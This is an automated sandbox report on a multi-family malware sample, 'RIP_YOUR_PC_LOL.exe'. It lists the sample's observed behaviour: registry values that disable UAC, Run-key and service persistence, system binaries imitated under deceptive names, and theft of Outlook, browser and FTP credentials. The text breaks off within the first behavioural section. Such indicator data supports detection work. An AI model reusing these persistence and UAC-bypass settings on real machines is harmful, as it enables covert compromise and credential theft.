Malware Analysis Report

2025-01-02 13:35

Sample ID 241204-xxpd2sslem
Target RIP_YOUR_PC_LOL.exe
SHA256 37d8e1ce3b6e6488942717aa78cb54785edc985143bcc8d9ba9f42d73a3dbd7a
Tags
blackmoon nanocore njrat asyncrat azorult dcrat fickerstealer gh0strat hawkeye oski pony purplefox raccoon redline xmrig 5781468cedb3a203003fdf1f12e72fe98d6f1c0f @zhilsholi default banker collection credential_access defense_evasion discovery evasion infostealer keylogger miner persistence privilege_escalation rat rootkit spyware stealer trojan upx mediaget
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

37d8e1ce3b6e6488942717aa78cb54785edc985143bcc8d9ba9f42d73a3dbd7a

Threat Level: Known bad

The file RIP_YOUR_PC_LOL.exe was found to be: Known bad.

Malicious Activity Summary

blackmoon nanocore njrat asyncrat azorult dcrat fickerstealer gh0strat hawkeye oski pony purplefox raccoon redline xmrig 5781468cedb3a203003fdf1f12e72fe98d6f1c0f @zhilsholi default banker collection credential_access defense_evasion discovery evasion infostealer keylogger miner persistence privilege_escalation rat rootkit spyware stealer trojan upx mediaget

Dcrat family

Purplefox family

AsyncRat

Azorult

Fickerstealer family

NanoCore

Raccoon

njRAT/Bladabindi

Process spawned unexpected child process

Blackmoon family

Azorult family

Raccoon Stealer V1 payload

DcRat

Raccoon family

Redline family

Gh0strat family

Pony family

HawkEye

UAC bypass

Fickerstealer

PurpleFox

Detect Blackmoon payload

xmrig

Njrat family

Hawkeye family

Asyncrat family

Gh0strat

Pony,Fareit

Xmrig family

RedLine

Oski family

Gh0st RAT payload

Nanocore family

Oski

Blackmoon, KrBanker

Detect PurpleFox Rootkit

Detected Nirsoft tools

Async RAT payload

NirSoft WebBrowserPassView

NirSoft MailPassView

XMRig Miner payload

DCRat payload

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Modifies Windows Firewall

Drops file in Drivers directory

Sets service image path in registry

Downloads MZ/PE file

Server Software Component: Terminal Services DLL

Uses the VBS compiler for execution

Executes dropped EXE

Reads data files stored by FTP clients

Checks BIOS information in registry

Impair Defenses: Safe Mode Boot

Checks computer location settings

Loads dropped DLL

Drops startup file

Unexpected DNS network traffic destination

Unsecured Credentials: Credentials In Files

Reads user/profile data of web browsers

Indicator Removal: File Deletion

Enumerates connected drives

Looks up external IP address via web service

Accesses Microsoft Outlook profiles

Checks whether UAC is enabled

Accesses Microsoft Outlook accounts

Checks installed software on the system

Adds Run key to start application

Checks system information in the registry

Suspicious use of SetThreadContext

UPX packed file

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

System Network Configuration Discovery: Internet Connection Discovery

Event Triggered Execution: Netsh Helper DLL

Unsigned PE

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Program crash

Browser Information Discovery

Suspicious behavior: LoadsDriver

System policy modification

Modifies system certificate store

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

NTFS ADS

Enumerates system info in registry

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

outlook_win_path

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of SetWindowsHookEx

Scheduled Task/Job: Scheduled Task

Suspicious use of FindShellTrayWindow

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

Checks SCSI registry key(s)

Runs ping.exe

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-12-04 19:14

Signatures

Blackmoon family

blackmoon

Detect Blackmoon payload

Description Indicator Process Target
N/A N/A N/A N/A

Nanocore family

nanocore

Njrat family

njrat

Detected Nirsoft tools

Description Indicator Process Target
N/A N/A N/A N/A

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-12-04 19:14

Reported

2024-12-04 19:16

Platform

win7-20240903-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe"

Signatures

AsyncRat

rat asyncrat

Asyncrat family

asyncrat

Azorult

trojan infostealer azorult

Azorult family

azorult

Blackmoon family

blackmoon

Blackmoon, KrBanker

trojan banker blackmoon

DcRat

rat infostealer dcrat

Dcrat family

dcrat

Detect Blackmoon payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect PurpleFox Rootkit

rootkit
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Fickerstealer

infostealer fickerstealer

Fickerstealer family

fickerstealer

Gh0st RAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Gh0strat

rat gh0strat

Gh0strat family

gh0strat

HawkEye

keylogger trojan stealer spyware hawkeye

Hawkeye family

hawkeye

NanoCore

keylogger trojan stealer spyware nanocore

Nanocore family

nanocore

Njrat family

njrat

Oski

infostealer oski

Oski family

oski

Pony family

pony

Pony,Fareit

rat spyware stealer pony

PurpleFox

rootkit trojan purplefox

Purplefox family

purplefox

Raccoon

stealer raccoon

Raccoon Stealer V1 payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Raccoon family

raccoon

RedLine

infostealer redline

Redline family

redline

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Roaming\3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Roaming\3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Roaming\3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\ProgramData\Start Menu\dllhost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\ProgramData\Start Menu\dllhost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\ProgramData\Start Menu\dllhost.exe N/A

Xmrig family

xmrig

njRAT/Bladabindi

trojan njrat

xmrig

miner xmrig

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detected Nirsoft tools

Description Indicator Process Target
N/A N/A N/A N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\a.exe N/A

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\drivers\QAssist.sys C:\Windows\SysWOW64\TXPlatforn.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Server Software Component: Terminal Services DLL

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Ö÷¶¯·ÀÓù·þÎñÄ£¿é\Parameters\ServiceDll = "C:\\Windows\\system32\\259437400.txt" C:\Users\Admin\AppData\Local\Temp\svchos.exe N/A

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\QAssist\ImagePath = "system32\\DRIVERS\\QAssist.sys" C:\Windows\SysWOW64\TXPlatforn.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\a.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\a.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe C:\Users\Admin\AppData\Roaming\mediaget.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\healastounding.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Pluto Panel.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\test.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\gay.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\22.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\___11.19.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Opus.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\4.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe N/A
N/A N/A C:\Windows\SysWOW64\TXPlatforn.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchos.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\HD____11.19.exe N/A
N/A N/A C:\Windows\SysWOW64\TXPlatforn.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe N/A
N/A N/A C:\ProgramData\Start Menu\dllhost.exe N/A
N/A N/A C:\Windows\Help\Winlogon.exe N/A
N/A N/A C:\Windows\Cursors\WUDFhosts.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\healastounding.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\healastounding.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\healastounding.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\healastounding.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\healastounding.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\___11.19.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\healastounding.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\healastounding.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\healastounding.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\22.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\22.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\22.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\healastounding.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\4.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\4.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\4.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\4.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\4.exe N/A
N/A N/A C:\Windows\SysWOW64\TXPlatforn.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\___11.19.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\___11.19.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\___11.19.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchos.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\gay.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe N/A
N/A N/A C:\Windows\Help\Winlogon.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Uses the VBS compiler for execution

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Users\Admin\AppData\Roaming\aaa.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\AppData\Roaming\aaa.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TXPlatforn = "\"C:\\Recovery\\209d6542-69f6-11ef-b491-62cb582c238c\\TXPlatforn.exe\"" C:\Users\Admin\AppData\Roaming\3.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhost = "\"C:\\Documents and Settings\\taskhost.exe\"" C:\Users\Admin\AppData\Roaming\3.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate.exe" C:\Users\Admin\AppData\Roaming\Pluto Panel.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\a797c6ca3f5e7aff8fa1149c47fe9466 = "\"C:\\Users\\Admin\\AppData\\Roaming\\mediaget.exe\" .." C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ISS Host = "C:\\Program Files (x86)\\ISS Host\\isshost.exe" C:\Users\Admin\AppData\Roaming\Opus.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Program Files\\Uninstall Information\\sppsvc.exe\"" C:\Users\Admin\AppData\Roaming\3.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Windows\\System32\\KBDVNTC\\lsass.exe\"" C:\Users\Admin\AppData\Roaming\3.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\a797c6ca3f5e7aff8fa1149c47fe9466 = "\"C:\\Users\\Admin\\AppData\\Roaming\\mediaget.exe\" .." C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0fd7de5367376231a788872005d7ed4f = "\"C:\\Program Files\\Windows Portable Devices\\0fd7de5367376231a788872005d7ed4f.exe\"" C:\Users\Admin\AppData\Roaming\3.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a = "\"C:\\Users\\Admin\\AppData\\Roaming\\8f1c8b40c7be588389a8d382040b23bb\\a.exe\"" C:\Users\Admin\AppData\Roaming\3.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\ProgramData\\Start Menu\\dllhost.exe\"" C:\Users\Admin\AppData\Roaming\3.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\ProgramData\Start Menu\dllhost.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Roaming\a.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Roaming\Opus.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Roaming\3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Roaming\3.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\ProgramData\Start Menu\dllhost.exe N/A

Indicator Removal: File Deletion

defense_evasion

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A whatismyipaddress.com N/A N/A
N/A whatismyipaddress.com N/A N/A
N/A whatismyipaddress.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\TXPlatforn.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
File created C:\Windows\SysWOW64\259437400.txt C:\Users\Admin\AppData\Local\Temp\svchos.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat C:\Windows\SysWOW64\svchost.exe N/A
File created C:\Windows\SysWOW64\TXPlatforn.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
File opened for modification C:\Windows\SysWOW64\ini.ini C:\Users\Admin\AppData\Local\Temp\svchos.exe N/A
File created C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe C:\Windows\SysWOW64\svchost.exe N/A
File opened for modification C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe C:\Windows\SysWOW64\svchost.exe N/A
File created C:\Windows\System32\KBDVNTC\lsass.exe C:\Users\Admin\AppData\Roaming\3.exe N/A
File created C:\Windows\System32\KBDVNTC\6203df4a6bafc7c328ee7f6f8ca0a8a838a8a1b9 C:\Users\Admin\AppData\Roaming\3.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\ISS Host\isshost.exe C:\Users\Admin\AppData\Roaming\Opus.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe C:\Users\Admin\AppData\Roaming\___11.19.exe N/A
File created C:\Program Files (x86)\Google\Chrome\Application\chrome.exe C:\Users\Admin\AppData\Roaming\___11.19.exe N/A
File opened for modification C:\Program Files\Windows Portable Devices\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\3.exe N/A
File created C:\Program Files\Uninstall Information\sppsvc.exe C:\Users\Admin\AppData\Roaming\3.exe N/A
File created C:\Program Files\Uninstall Information\0a1fd5f707cd16ea89afd3d6db52b2da58214a6c C:\Users\Admin\AppData\Roaming\3.exe N/A
File created C:\Program Files (x86)\ISS Host\isshost.exe C:\Users\Admin\AppData\Roaming\Opus.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\firefox.exe C:\Users\Admin\AppData\Roaming\___11.19.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\vlc.exe C:\Users\Admin\AppData\Roaming\___11.19.exe N/A
File created C:\Program Files\Windows Portable Devices\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\3.exe N/A
File created C:\Program Files\Windows Portable Devices\81a075a9bdba30e81d300eb5cd970ab17cef3e5f C:\Users\Admin\AppData\Roaming\3.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Cursors\TrustedInsteller.exe C:\Users\Admin\AppData\Roaming\22.exe N/A
File created C:\Windows\Help\active_desktop_render_New.dll C:\Windows\SysWOW64\svchost.exe N/A
File created C:\Windows\Help\Winlogon.exe C:\Users\Admin\AppData\Roaming\22.exe N/A
File created C:\Windows\Help\active_desktop_render.dll C:\Users\Admin\AppData\Roaming\22.exe N/A
File created C:\Windows\Cursors\WUDFhosts.exe C:\Users\Admin\AppData\Roaming\22.exe N/A
File created C:\Windows\Cursors\KillProcc.sys C:\Users\Admin\AppData\Roaming\22.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
